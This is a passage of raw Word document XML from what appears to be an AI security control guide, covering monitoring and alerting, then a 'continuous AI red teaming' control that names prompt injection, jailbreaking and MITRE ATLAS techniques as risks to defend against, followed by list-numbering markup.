      <w:r w:rsidRPr="00E53977">
        <w:t>Centralize logging and analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA50D1" w14:textId="16D248F9" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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208CD09F" w14:textId="55CB62CD" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Automate alerting and escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CB3FA" w14:textId="35CD33A5" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure automated alerts for high-priority events such as detected jailbreak attempts or unauthorized data access using Azure Monitor, establishing escalation protocols to route alerts to security teams for rapid investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2CB70" w14:textId="0BD044B9" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Conduct regular testing and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF90FD4" w14:textId="160E8410" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Ensure compliance and auditability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B64BF" w14:textId="4B48FBE3" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Align monitoring practices with regulatory requirements (GDPR, CCPA, HIPAA) by maintaining comprehensive audit trails of AI </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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127" w:name="_Toc242449590"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-7: Perform continuous AI Red Teaming</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="26744E3A" w14:textId="6A580111" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E133A3" w14:textId="38E5F7E5" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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7FBCA24D" w14:textId="13CEC8FB" w:rsidR="002F4E52" w:rsidRPr="00E53977" w:rsidRDefault="002F4E52">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="203B5D21" w14:textId="1A68ACD8" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Prompt injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A774C" w14:textId="06BC3AFD" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adversarial examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9836FD" w14:textId="1910D53D" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Jailbreaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4CD1F1" w14:textId="231EA781" w:rsidR="00462E3B" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Techniques that bypass AI safety mechanisms allow adversaries to access restricted functionalities or generate prohibited content, exploiting weaknesses that evade detection without systematic security testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AC26FE" w14:textId="77777777" w:rsidR="000C5643" w:rsidRPr="00E53977" w:rsidRDefault="000C5643" w:rsidP="000C5643"/>
    <w:p w14:paraId="07793D8D" w14:textId="6029ED88" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22151C92" w14:textId="0B697F9C" w:rsidR="00462E3B" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM Prompt Injection (AML.T0051)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE5EA3" w14:textId="3816B442" w:rsidR="000C5643" w:rsidRPr="00E53977" w:rsidRDefault="000C5643">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5643">
        <w:t>Simulating prompt injection or jailbreaking to gain unauthorized access to AI functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC660B" w14:textId="43941188" w:rsidR="00462E3B" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM Data Leakage (AML.T0057)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4AF56" w14:textId="44AE490E" w:rsidR="000C5643" w:rsidRPr="00E53977" w:rsidRDefault="000C5643">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5643">
        <w:t>Simulating data leakage through inference attacks like model inversion or membership inference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE66AD" w14:textId="20667741" w:rsidR="00462E3B" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>External Harms (AML.T0048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25475DCD" w14:textId="62275E88" w:rsidR="000C5643" w:rsidRPr="00E53977" w:rsidRDefault="000C5643">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5643">
        <w:t>Assessing the potential for harmful outcomes such as biased outputs or operational disruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FEFD17" w14:textId="3F92E0EB" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B" w:rsidP="00462E3B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AI-7.1: Perform continuous AI Red Teaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60755B5C" w14:textId="61A50CA0" w:rsidR="00462E3B" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implementing continuous AI red teaming integrates adversarial testing into the AI development and deployment lifecycle, proactively identifying vulnerabilities before adversaries exploit them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F945B5" w14:textId="77777777" w:rsidR="00CD7DBA" w:rsidRPr="00E53977" w:rsidRDefault="00CD7DBA" w:rsidP="00CD7DBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF7CD7B" w14:textId="4037A673" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Define red teaming objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D7400" w14:textId="607EEE26" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Establish clear goals such as identifying vulnerabilities in AI application inputs/outputs, testing plugin security, or validating robustness against specific attack vectors (prompt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>, adversarial examples), aligning objectives with business and regulatory requirements while prioritizing high-risk components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60895FD0" w14:textId="443E8FC6" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Leverage specialized red teaming tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93602E" w14:textId="00BC3D43" w:rsidR="00462E3B" w:rsidRPr="00E53977" w:rsidRDefault="00462E3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate open-source security frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666680A2" w14:textId="288F5BAF" w:rsidR="004339B3" w:rsidRPr="00E53977" w:rsidRDefault="004339B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Simulate real-world adversarial scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D1F7C" w14:textId="7AC8D728" w:rsidR="004339B3" w:rsidRPr="00E53977" w:rsidRDefault="004339B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate with development lifecycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4D968" w14:textId="56EE6B03" w:rsidR="004339B3" w:rsidRPr="00E53977" w:rsidRDefault="004339B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Embed red teaming in CI/CD pipelines using Azure DevOps or GitHub Actions automating vulnerability scans during model training, fine-tuning, and deployment, conducting pre-deployment validation to address vulnerabilities before production, and performing continuous testing in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A0621" w14:textId="70196A5B" w:rsidR="004339B3" w:rsidRPr="00E53977" w:rsidRDefault="004339B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Involve cross-functional teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42944AE3" w14:textId="0DE4D7FF" w:rsidR="004339B3" w:rsidRPr="00E53977" w:rsidRDefault="004339B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Engage AI developers, security professionals, and domain experts in red teaming exercises ensuring comprehensive coverage of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>technical, operational, and business risks, training teams on AI-specific threats using resources like OWASP Top 10 for LLM or MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C422975" w14:textId="45A7ADC6" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Monitor and analyze red teaming results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D210B" w14:textId="501C50DB" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Maintain comprehensive audit trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0C3BA" w14:textId="330904EE" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Store red teaming activities in Azure Blob Storage for compliance and post-incident analysis, maintaining detailed documentation of testing methodologies, findings, and remediation actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C6E3B" w14:textId="3A0594B8" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Iterate and remediate vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B42D8A" w14:textId="5BFA6034" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adopt continuous testing cadence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B60D7" w14:textId="40284A7A" w:rsidR="00F82B92" w:rsidRPr="00E53977" w:rsidRDefault="00F82B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Schedule regular red teaming exercises (monthly or quarterly) accounting for evolving threats and model updates, incorporate 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287C" w14:textId="77777777" w:rsidR="00D27749" w:rsidRDefault="00D27749" w:rsidP="00741C12">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A367CAC" w14:textId="77777777" w:rsidR="00D27749" w:rsidRDefault="00D27749"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D6F5F" w14:textId="77777777" w:rsidR="00D27749" w:rsidRDefault="00D27749" w:rsidP="00741C12">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F5C66D7" w14:textId="77777777" w:rsidR="00D27749" w:rsidRDefault="00D27749"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4B6B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72BE5B3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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00520A3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02F6FE3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F369AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EECE073C"/>
    <w:lvl w:ilvl="0" w:tplc="FDFA203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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="02367F33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D51635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6E5A5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1B4265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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="036E4101"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E4EA3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AD2A7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3044E75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03D64D0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FF0B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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03ED4D4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1244394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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="04572CFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6421B24"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="04641F5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB7C48B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047775CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E57A0FF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4F43063"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F43A0DF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05B6550B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E627D3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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05F068B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FE2370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5FB0B7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D67A9A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6BF019C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF1A5AD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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06C02940"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8842CF4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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06D65CDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EA85FD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25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06E415B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5E0435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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0735396B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E228BAB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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="078B137E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEFEE57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08166B3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36D8589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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="081E15B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B766663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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="08597213"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="201E97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070104"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F5AC4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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="093C016D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0D2E0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9537DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0938E7F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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09F35170"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD2E75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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B061A30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DF47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B1141DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A348A7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40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C751F47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B1C72F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81D22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C27094"/>
    <w:lvl w:ilvl="0" w:tplc="12B06C1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0CE73436"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="677EDC8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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0CF83BB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B1697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0D923FBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18F035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B8024D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50821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E5D39F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75E2E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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E7B37C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DBA4A55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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EA760DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C56E8AD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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EC3081F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7866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F6E1CB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F908F4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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0F920BA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D528DD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0FB8326C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E68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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FD62A73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="583A33F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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FFB436D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA08B66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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="103F03AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0348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06E03A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46FA3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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10792BC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37FC25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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10B47633"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F2042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0D31C46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="312A6E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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10EF4784"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBAE8E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2"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3"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64" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11B7564E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
